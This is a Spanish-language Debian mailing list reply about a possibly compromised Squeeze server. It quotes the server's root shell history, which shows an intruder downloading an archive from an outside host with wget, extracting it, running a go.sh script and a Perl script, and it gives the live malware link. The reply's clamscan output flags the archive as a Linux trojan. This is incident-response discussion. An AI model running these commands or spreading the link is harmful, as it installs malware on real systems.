[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Posible intrusión un server

El Fri, 13 May 2011 12:39:56 -0300
ciracusa <ciracusa@gmail.com> va dir:

> Lista, buenas tardes.
> 
> Perdón si este tema no esta directamente relacionado con Debian, pero 
> como el server en cuestión tiene Squeeze y es un tema de seguridad creo 
> que puede interesarles a mas de uno.
> 
> Ayer viendo el history de root de un servidor veo lo siguiente:
> 
>    314  ./go.sh 189
>    315  w
>    316  cd
>    317  cd /var/tmp/
>    318  rm -rf gosh
>    319  ls -a
>    320  exit
>    321  cat /proc/cpuinfo
>    322  passwd
>    323  cd /var/tmp/
>    324  cd gosh
>    325  touch bios.txt
>    326  chmod +x *
>    327  screen
>    328  exit
>    329  cat /proc/cpuinfo
>    330  cd /var/tmp/
>    331  ls -a
>    332  wget http://gblteam.webs.com/gosh.tgz.tar
>    333  tar zxvf gosh.tgz.tar
>    334  rm -rf gosh.tgz.tar
>    335  cd gosh
>    336  touch bios.txt
>    337  chmod +x *
>    338  ./go.sh 200
>    339  cd
>    340  cd /var/tmp/
>    341  ls -a
>    342  rm -rf gosh
>    343  ls -a
>    344  exit
>    345  cd /var/tmp/
>    346  perl x.pl
> 
> 
> Que opinan?
> 
> Entiendo -lamentablemente- que el server fue comprometido, pero lo que 
> no llego a comprender es el alcance de esto.
> 
> Notar que puse el link para que puedan descargarlo uds. también y 
> analizarlo (tomando las precauciones del caso).
> 
> Bueno, si alguien tiene algo de info muy agradecido.
> 
> Y si pueden recomendarme algunos pasos para analizar la seguridad del 
> server desde ya muchas gracias.
> 
> Salu2.
> 
> 
$ clamscan gosh.tgz.tar 
gosh.tgz.tar: Trojan.Linux.RST.b FOUND

----------- SCAN SUMMARY -----------
Known viruses: 971880
Engine version: 0.97
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.22 MB
Data read: 1.57 MB (ratio 0.14:1)
Time: 9.874 sec (0 m 9 s)
Reply to: